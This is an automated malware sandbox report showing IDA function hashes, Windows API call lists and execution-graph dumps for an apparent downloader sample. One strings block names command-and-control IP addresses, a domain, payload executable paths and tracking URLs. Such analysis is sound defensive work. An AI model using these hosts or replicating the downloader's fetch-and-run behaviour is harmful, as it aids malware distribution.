• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetEnabledXStateFeatures$kernel32
• API String ID: 2574300362-4273408117
• Opcode ID: b08a5a720ce188483b39534ef43e19380aa5d66f192d192fcf3d5c93a0855522
• Instruction ID: 5f709c19ffaad15598a00e339e982db1570cd335804dedfe1db45c3fedff6960
• Opcode Fuzzy Hash: b08a5a720ce188483b39534ef43e19380aa5d66f192d192fcf3d5c93a0855522
• Instruction Fuzzy Hash: A8E04F56F2660281EE459731DC4A2E413A26F99B02FC85475C80D82391ED3EB64AAB04
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: SwitchThread
• String ID:
• API String ID: 115865932-0
• Opcode ID: d060ab58e4891d87f918f318ed0f2b7e32d521a8a2381aa6b0013beb4367307f
• Instruction ID: 8419e46b958c0c517004dbdb0d6b480da6417fc7fee3692307f1ea7e875d28d7
• Opcode Fuzzy Hash: d060ab58e4891d87f918f318ed0f2b7e32d521a8a2381aa6b0013beb4367307f
• Instruction Fuzzy Hash: 9B41B273B1DA5685EB604E35D0506B97251EB06B98F648139CA0EC6785DF3FE440BB0E
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: SwitchThread
• String ID:
• API String ID: 115865932-0
• Opcode ID: 4c2d10cc3444108c4523fbbaa5f59541c6da74beb0e924c2b778705351e09b8e
• Instruction ID: 38950ec36ca2166aeec14dbcb2b8ec3ccf169fad620b5d6c7e77626079ac5340
• Opcode Fuzzy Hash: 4c2d10cc3444108c4523fbbaa5f59541c6da74beb0e924c2b778705351e09b8e
• Instruction Fuzzy Hash: 50512732E0C24386F2A49B369C41AF626E1AF90764F147139E909C63D2DF3FB845A748
Uniqueness
Uniqueness Score: -1.00%

APIs
• WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC634
• SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC63E
• CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC65D
• SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6385C6771), ref: 00007FF6385CC671
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: ErrorLastMultipleWait$HandlesObjects
• String ID:
• API String ID: 2817213684-0
• Opcode ID: 67f23748c3b61cb067a274dbe642dd452515bfc227d612fc3c487a1f62bebced
• Instruction ID: e620bfc3493872b37b34088112489cb6cf9f9a118c048968b25315905f577a48
• Opcode Fuzzy Hash: 67f23748c3b61cb067a274dbe642dd452515bfc227d612fc3c487a1f62bebced
• Instruction Fuzzy Hash: 1011C632A1C65582D7548B39F50506EB2B1FB44BA0F541135EA8DC3BA5CF3DE8849B04
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlPcToFileHeader.KERNEL32(00007FF63862B813,?,?,?,?,00007FF63862AC4B), ref: 00007FF63862C55C
• RaiseException.KERNEL32(00007FF63862B813,?,?,?,?,00007FF63862AC4B), ref: 00007FF63862C59D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: e11c1d1156c9dddb2ab9c678c25123368fccadaa3a46d84ece72b3ed049504f5
• Instruction ID: ea95979c90254abb6168272b2b1b761ccad9beccc2b5597aebf8d853df8542ee
• Opcode Fuzzy Hash: e11c1d1156c9dddb2ab9c678c25123368fccadaa3a46d84ece72b3ed049504f5
• Instruction Fuzzy Hash: 46116033618B8182EB218F29F44029977E5FB89B94F588270DE8C47758DF3ED561D704
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: EventObjectSingleWait
• String ID: `
• API String ID: 582559000-931675499
• Opcode ID: e22c64d9e76dbcf40433fe56571f9d05964c85f6897a86a8bdf132f0c48186d9
• Instruction ID: c6d2858eb7011121d604f03d2443190a24c0efc32404bd9e0486f677b3f39643
• Opcode Fuzzy Hash: e22c64d9e76dbcf40433fe56571f9d05964c85f6897a86a8bdf132f0c48186d9
• Instruction Fuzzy Hash: AEE0D813F1C56202F680BB357D425ED12518F86B90F142531F65E867C7CD2EE041770C
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F406E
• LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F40BE
• EnterCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F40F3
• LeaveCriticalSection.KERNEL32(?,00000000,07FFF001,00007FF6385EF8C2,?,00000000,?,?,00000000,00007FF6385FF0A9), ref: 00007FF6385F410E
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                  • Opcode ID: 5aa4cda33fc5194f8a1b2b6926be0ef662f9fb6268db9e3c9624ff6a2187fdb7
                                                                                                                                                                                                                                  • Instruction ID: e8ab40f33e7d2b909ca1281ab09ddb4522351482e028640bed1eaa7787bffab8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aa4cda33fc5194f8a1b2b6926be0ef662f9fb6268db9e3c9624ff6a2187fdb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED413D33A0CA4281FB90CF30E9405B823A9FF54B95F544136DA4C877A5DF3EE656A348
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6E8A
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6ECC
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6EF7
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF6385E6FC9,?,?,00000000,00007FF6385F268A), ref: 00007FF6385E6F18
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                  • Opcode ID: da6822992602bf8f165ef32727c3954354a905e724eeb3c9890d901bceae0b34
                                                                                                                                                                                                                                  • Instruction ID: 6db3442c6d1109d7b26cceddbfb6e2456d401d6608f876f41dd7bfef11696c48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da6822992602bf8f165ef32727c3954354a905e724eeb3c9890d901bceae0b34
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE211D23A1894781FF909B34E9443F822A0EF147A4F880632D52C827D9DF7EE59DE318
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:10.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                                  Signature Coverage:13%
                                                                                                                                                                                                                                  Total number of Nodes:1106
                                                                                                                                                                                                                                  Total number of Limit Nodes:15
                                                                                                                                                                                                                                  execution_graph 20438 5bd003c 20439 5bd0049 20438->20439 20453 5bd0e0f SetErrorMode SetErrorMode 20439->20453 20444 5bd0265 20445 5bd02ce VirtualProtect 20444->20445 20447 5bd030b 20445->20447 20446 5bd0439 VirtualFree 20451 5bd05f4 LoadLibraryA 20446->20451 20452 5bd04be 20446->20452 20447->20446 20448 5bd04e3 LoadLibraryA 20448->20452 20450 5bd08c7 20451->20450 20452->20448 20452->20451 20454 5bd0223 20453->20454 20455 5bd0d90 20454->20455 20456 5bd0dad 20455->20456 20457 5bd0dbb GetPEB 20456->20457 20458 5bd0238 VirtualAlloc 20456->20458 20457->20458 20458->20444 20459 408273 20461 40828f 20459->20461 20460 4082ce 20465 4082d5 20460->20465 20469 40831c 20460->20469 20461->20460 20464 40831c std::_Xfsopen 29 API calls 20461->20464 20466 4082db 20461->20466 20464->20460 20465->20466 20475 40e228 20465->20475 20488 411d32 20469->20488 20471 4082ee 20471->20466 20472 4106ef 20471->20472 20549 41049b 20472->20549 20474 410705 20474->20465 20476 40e234 CallCatchBlock 20475->20476 20477 40e245 20476->20477 20478 40e25a 20476->20478 20647 412381 20 API calls __dosmaperr 20477->20647 20487 40e255 _Xfiopen 20478->20487 20630 40e81d EnterCriticalSection 20478->20630 20480 40e24a 20648 410905 26 API calls _Deallocate 20480->20648 20483 40e276 20631 40e1b2 20483->20631 20485 40e281 20649 40e29e LeaveCriticalSection _Xfiopen 20485->20649 20487->20466 20490 411c71 CallCatchBlock 20488->20490 20489 411c8b 20513 412381 20 API calls __dosmaperr 20489->20513 20490->20489 20492 411cb8 20490->20492 20494 411cca 20492->20494 20495 411cbd 20492->20495 20493 411c90 20514 410905 26 API calls _Deallocate 20493->20514 20505 416499 20494->20505 20515 412381 20 API calls __dosmaperr 20495->20515 20499 411cd3 20501 411ce7 std::_Xfsopen 20499->20501 20502 411cda 
20499->20502 20500 411c9b _Xfiopen 20500->20471 20517 411d1b LeaveCriticalSection _Xfiopen 20501->20517 20516 412381 20 API calls __dosmaperr 20502->20516 20506 4164a5 CallCatchBlock 20505->20506 20518 411a06 EnterCriticalSection 20506->20518 20508 4164b3 20519 416533 20508->20519 20512 4164e4 _Xfiopen 20512->20499 20513->20493 20514->20500 20515->20500 20516->20500 20517->20500 20518->20508 20528 416556 20519->20528 20520 4164c0 20533 4164ef 20520->20533 20521 4165af 20538 41704e 20 API calls 3 library calls 20521->20538 20523 4165b8 20539 41629a 20523->20539 20526 4165c1 20526->20520 20545 4175b5 11 API calls 2 library calls 20526->20545 20528->20520 20528->20521 20536 40e81d EnterCriticalSection 20528->20536 20537 40e831 LeaveCriticalSection 20528->20537 20529 4165e0 20546 40e81d EnterCriticalSection 20529->20546 20532 4165f3 20532->20520 20548 411a4e LeaveCriticalSection 20533->20548 20535 4164f6 20535->20512 20536->20528 20537->20528 20538->20523 20540 4162ce _free 20539->20540 20541 4162a5 RtlFreeHeap 20539->20541 20540->20526 20541->20540 20542 4162ba 20541->20542 20547 412381 20 API calls __dosmaperr 20542->20547 20544 4162c0 GetLastError 20544->20540 20545->20529 20546->20532 20547->20544 20548->20535 20550 4104a7 CallCatchBlock 20549->20550 20551 4104b3 20550->20551 20553 4104d9 20550->20553 20574 412381 20 API calls __dosmaperr 20551->20574 20562 40e81d EnterCriticalSection 20553->20562 20555 4104b8 20575 410905 26 API calls _Deallocate 20555->20575 20556 4104e5 20563 4105fb 20556->20563 20559 4104f9 20576 410518 LeaveCriticalSection _Xfiopen 20559->20576 20561 4104c3 _Xfiopen 20561->20474 20562->20556 20564 41061d 20563->20564 20565 41060d 20563->20565 20577 410522 20564->20577 20590 412381 20 API calls __dosmaperr 20565->20590 20568 410612 20568->20559 20570 410640 _Xfiopen 20573 4106bf 20570->20573 20581 40dfcb 20570->20581 20573->20559 20574->20555 20575->20561 20576->20561 20578 410535 20577->20578 20580 41052e _Xfiopen 20577->20580 20579 419800 
__fread_nolock 28 API calls 20578->20579 20578->20580 20579->20580 20580->20570 20582 40dfe3 20581->20582 20583 40dfdf 20581->20583 20582->20583 20591 4154e8 20582->20591 20587 419800 20583->20587 20585 40e003 20598 415fa3 62 API calls 5 library calls 20585->20598 20601 419767 20587->20601 20590->20568 20592 4154f4 20591->20592 20593 415509 20591->20593 20599 412381 20 API calls __dosmaperr 20592->20599 20593->20585 20595 4154f9 20600 410905 26 API calls _Deallocate 20595->20600 20597 415504 20597->20585 20598->20583 20599->20595 20600->20597 20610 41e97a 20601->20610 20603 419779 20604 419781 20603->20604 20605 419792 SetFilePointerEx 20603->20605 20623 412381 20 API calls __dosmaperr 20604->20623 20606 4197aa GetLastError 20605->20606 20609 419786 20605->20609 20624 41234b 20 API calls 2 library calls 20606->20624 20609->20573 20611 41e987 20610->20611 20612 41e99c 20610->20612 20625 41236e 20 API calls __dosmaperr 20611->20625 20617 41e9c1 20612->20617 20627 41236e 20 API calls __dosmaperr 20612->20627 20614 41e98c 20626 412381 20 API calls __dosmaperr 20614->20626 20617->20603 20618 41e9cc 20628 412381 20 API calls __dosmaperr 20618->20628 20619 41e994 20619->20603 20621 41e9d4 20629 410905 26 API calls _Deallocate 20621->20629 20623->20609 20624->20609 20625->20614 20626->20619 20627->20618 20628->20621 20629->20619 20630->20483 20632 40e1d4 20631->20632 20633 40e1bf 20631->20633 20635 40dfcb _Xfiopen 62 API calls 20632->20635 20639 40e1cf _Xfiopen 20632->20639 20669 412381 20 API calls __dosmaperr 20633->20669 20637 40e1e8 20635->20637 20636 40e1c4 20670 410905 26 API calls _Deallocate 20636->20670 20650 4165f6 20637->20650 20639->20485 20642 4154e8 _Xfiopen 26 API calls 20643 40e1f6 20642->20643 20654 41637e 20643->20654 20646 41629a _free 20 API calls 20646->20639 20647->20480 20648->20487 20649->20487 20651 40e1f0 20650->20651 20652 41660c 20650->20652 20651->20642 20652->20651 20653 41629a _free 20 API calls 20652->20653 20653->20651 20655 4163a2 
20654->20655 20656 41638d 20654->20656 20658 4163dd 20655->20658 20663 4163c9 20655->20663 20674 41236e 20 API calls __dosmaperr 20656->20674 20676 41236e 20 API calls __dosmaperr 20658->20676 20660 416392 20675 412381 20 API calls __dosmaperr 20660->20675 20661 4163e2 20677 412381 20 API calls __dosmaperr 20661->20677 20671 416356 20663->20671 20666 4163ea 20678 410905 26 API calls _Deallocate 20666->20678 20667 40e1fc 20667->20639 20667->20646 20669->20636 20670->20639 20679 4162d4 20671->20679 20673 41637a 20673->20667 20674->20660 20675->20667 20676->20661 20677->20666 20678->20667 20680 4162e0 CallCatchBlock 20679->20680 20690 41e6fd EnterCriticalSection 20680->20690 20682 4162ee 20683 416320 20682->20683 20684 416315 20682->20684 20706 412381 20 API calls __dosmaperr 20683->20706 20691 4163fd 20684->20691 20687 41631b 20707 41634a LeaveCriticalSection __wsopen_s 20687->20707 20689 41633d _Xfiopen 20689->20673 20690->20682 20692 41e97a __wsopen_s 26 API calls 20691->20692 20695 41640d 20692->20695 20693 416413 20708 41e8e9 21 API calls 3 library calls 20693->20708 20695->20693 20696 416445 20695->20696 20698 41e97a __wsopen_s 26 API calls 20695->20698 20696->20693 20699 41e97a __wsopen_s 26 API calls 20696->20699 20697 41646b 20701 41648d 20697->20701 20709 41234b 20 API calls 2 library calls 20697->20709 20702 41643c 20698->20702 20700 416451 FindCloseChangeNotification 20699->20700 20700->20693 20703 41645d GetLastError 20700->20703 20701->20687 20705 41e97a __wsopen_s 26 API calls 20702->20705 20703->20693 20705->20696 20706->20687 20707->20689 20708->20697 20709->20701 20710 416ec2 20711 416ecf 20710->20711 20715 416ee7 20710->20715 20760 412381 20 API calls __dosmaperr 20711->20760 20713 416ed4 20761 410905 26 API calls _Deallocate 20713->20761 20716 416f42 20715->20716 20724 416edf 20715->20724 20762 418c55 21 API calls 2 library calls 20715->20762 20718 4154e8 _Xfiopen 26 API calls 20716->20718 20719 416f5a 20718->20719 20730 41919a 20719->20730 20721 
416f61 20722 4154e8 _Xfiopen 26 API calls 20721->20722 20721->20724 20723 416f8d 20722->20723 20723->20724 20725 4154e8 _Xfiopen 26 API calls 20723->20725 20726 416f9b 20725->20726 20726->20724 20727 4154e8 _Xfiopen 26 API calls 20726->20727 20728 416fab 20727->20728 20729 4154e8 _Xfiopen 26 API calls 20728->20729 20729->20724 20731 4191a6 CallCatchBlock 20730->20731 20732 4191ae 20731->20732 20734 4191c6 20731->20734 20829 41236e 20 API calls __dosmaperr 20732->20829 20733 41928c 20836 41236e 20 API calls __dosmaperr 20733->20836 20734->20733 20739 4191ff 20734->20739 20737 4191b3 20830 412381 20 API calls __dosmaperr 20737->20830 20741 419223 20739->20741 20742 41920e 20739->20742 20740 419291 20837 412381 20 API calls __dosmaperr 20740->20837 20763 41e6fd EnterCriticalSection 20741->20763 20831 41236e 20 API calls __dosmaperr 20742->20831 20746 41921b 20838 410905 26 API calls _Deallocate 20746->20838 20747 419213 20832 412381 20 API calls __dosmaperr 20747->20832 20748 419229 20751 419245 20748->20751 20752 41925a 20748->20752 20749 4191bb _Xfiopen 20749->20721 20833 412381 20 API calls __dosmaperr 20751->20833 20764 4192ad 20752->20764 20756 41924a 20834 41236e 20 API calls __dosmaperr 20756->20834 20757 419255 20835 419284 LeaveCriticalSection __wsopen_s 20757->20835 20760->20713 20761->20724 20762->20716 20763->20748 20765 4192d7 20764->20765 20766 4192bf 20764->20766 20768 419641 20765->20768 20771 41931c 20765->20771 20848 41236e 20 API calls __dosmaperr 20766->20848 20869 41236e 20 API calls __dosmaperr 20768->20869 20769 4192c4 20849 412381 20 API calls __dosmaperr 20769->20849 20774 419327 20771->20774 20775 4192cc 20771->20775 20782 419357 20771->20782 20773 419646 20870 412381 20 API calls __dosmaperr 20773->20870 20850 41236e 20 API calls __dosmaperr 20774->20850 20775->20757 20778 419334 20871 410905 26 API calls _Deallocate 20778->20871 20779 41932c 20851 412381 20 API calls __dosmaperr 20779->20851 20783 419370 20782->20783 20784 4193b2 
20782->20784 20785 419396 20782->20785 20783->20785 20818 41937d 20783->20818 20855 417a45 20784->20855 20852 41236e 20 API calls __dosmaperr 20785->20852 20787 41939b 20853 412381 20 API calls __dosmaperr 20787->20853 20792 4193a2 20854 410905 26 API calls _Deallocate 20792->20854 20793 41951b 20796 419591 20793->20796 20799 419534 GetConsoleMode 20793->20799 20794 41629a _free 20 API calls 20797 4193d2 20794->20797 20798 419595 ReadFile 20796->20798 20800 41629a _free 20 API calls 20797->20800 20801 419609 GetLastError 20798->20801 20802 4195af 20798->20802 20799->20796 20803 419545 20799->20803 20804 4193d9 20800->20804 20805 419616 20801->20805 20806 41956d 20801->20806 20802->20801 20807 419586 20802->20807 20803->20798 20808 41954b ReadConsoleW 20803->20808 20809 4193e3 20804->20809 20810 4193fe 20804->20810 20867 412381 20 API calls __dosmaperr 20805->20867 20827 4193ad __fread_nolock 20806->20827 20864 41234b 20 API calls 2 library calls 20806->20864 20822 4195d4 20807->20822 20823 4195eb 20807->20823 20807->20827 20808->20807 20814 419567 GetLastError 20808->20814 20862 412381 20 API calls __dosmaperr 20809->20862 20813 419800 __fread_nolock 28 API calls 20810->20813 20813->20818 20814->20806 20815 41629a _free 20 API calls 20815->20775 20816 4193e8 20863 41236e 20 API calls __dosmaperr 20816->20863 20817 41961b 20868 41236e 20 API calls __dosmaperr 20817->20868 20839 421229 20818->20839 20865 418fc9 31 API calls 3 library calls 20822->20865 20825 419602 20823->20825 20823->20827 20866 418e09 29 API calls __fread_nolock 20825->20866 20827->20815 20828 419607 20828->20827 20829->20737 20830->20749 20831->20747 20832->20746 20833->20756 20834->20757 20835->20749 20836->20740 20837->20746 20838->20749 20840 421243 20839->20840 20841 421236 20839->20841 20844 42124f 20840->20844 20873 412381 20 API calls __dosmaperr 20840->20873 20872 412381 20 API calls __dosmaperr 20841->20872 20843 42123b 20843->20793 20844->20793 20846 421270 20874 410905 26 API calls 
Call-graph / control-flow edge data exported from the report's interactive graph viewer (numeric node ids and their edges are not reproduced here). Root nodes in the exported data include the functions at 409385, 424b3e, 41aff9, 40cc536 and 41870f.

Windows API calls referenced in the graph data: RtlAllocateHeap, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetStartupInfoW, GetModuleFileNameA, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, RaiseException, EnterCriticalSection, LeaveCriticalSection, GetLastError, MultiByteToWideChar, CreateFileA, CreateFileW, GetFileType, WriteFile, FindCloseChangeNotification, CloseHandle, GetTempPathA, ShellExecuteExA, WaitForSingleObject, RegCreateKeyExA, RegSetValueExA, RegCloseKey, WSAStartup, WSACleanup, socket, gethostbyname, htons, connect, send, recv, closesocket, CreateToolhelp32Snapshot, Module32First, VirtualAlloc. C runtime and C++ library symbols (e.g. __EH_prolog, __dosmaperr, _Deallocate, std::ios_base::_Ios_base_dtor, std::_Lockit) also appear as intermediate nodes.

Control-flow Graph

Control-flow graph of the function at 424b3e (basic blocks 424b3e through 425e3b). In the original rendering, blocks are colour-coded as Executed or Not Executed; the basic-block and edge listing from the graph viewer is not reproduced here. Within this function, the graph shows a direct call to GetModuleFileNameA and calls into the subroutines 403498, 426354, 425ee2, 4034e3, 426504, 42612f, 40356f, 410c91, 426217, 426260 and 42631a, among others.
APIs
  • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
  • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
  • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
• String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
• API String ID: 2531350358-4166474000
• Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
• Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
• Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
• Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00426509
• WSAStartup.WS2_32(00000202,?), ref: 00427195
• socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
• WSACleanup.WS2_32 ref: 004271C5
• gethostbyname.WS2_32(00000000), ref: 004271D9
• htons.WS2_32(?), ref: 0042720B
